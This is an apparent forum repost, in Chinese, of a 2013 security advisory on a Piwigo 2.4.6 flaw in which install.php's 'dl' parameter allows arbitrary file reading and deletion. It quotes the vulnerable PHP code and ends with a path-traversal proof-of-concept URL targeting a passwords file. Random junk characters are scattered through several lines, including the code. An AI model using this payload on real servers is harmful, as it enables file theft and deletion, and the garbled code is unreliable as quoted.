Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

0 ]5 r1 z! t1 i! K3 `Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
/install.php:
+ x! y' g: ?  f; n+ K; o7 F-------------
6 ?; [# {3 X) r113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
  i3 b' e" _" ?" q* a, D% m1 q, S114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
+ {6 R9 n  D3 r117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
; N3 B1 A# `5 Q6 q; O122:   unlink($filename);
+ Y& s  f  }4 p" Z9 H+ Q' I+ e123:   exit();
124: }
====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
% v$ N8 t2 h* ]# B! H5 I) r           PHP 5.4.4
! z* f" r2 l- r- _           MySQL 5.5.25a
) x! h6 ]1 g: C, J/ B5 U' @! l
, R8 j& C$ l9 B+ ]1 q1 {9 BVulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
4 ~9 R* J. Y3 ?8 \
Advisory ID: ZSL-2013-5127
  A* h) L7 t9 v& R3 p  [6 x$ i8 _* M' I, |Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--
  }& z! U3 i* y# V( a: @http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
9 @+ C, m  w: K, x/ i! [9 U2 U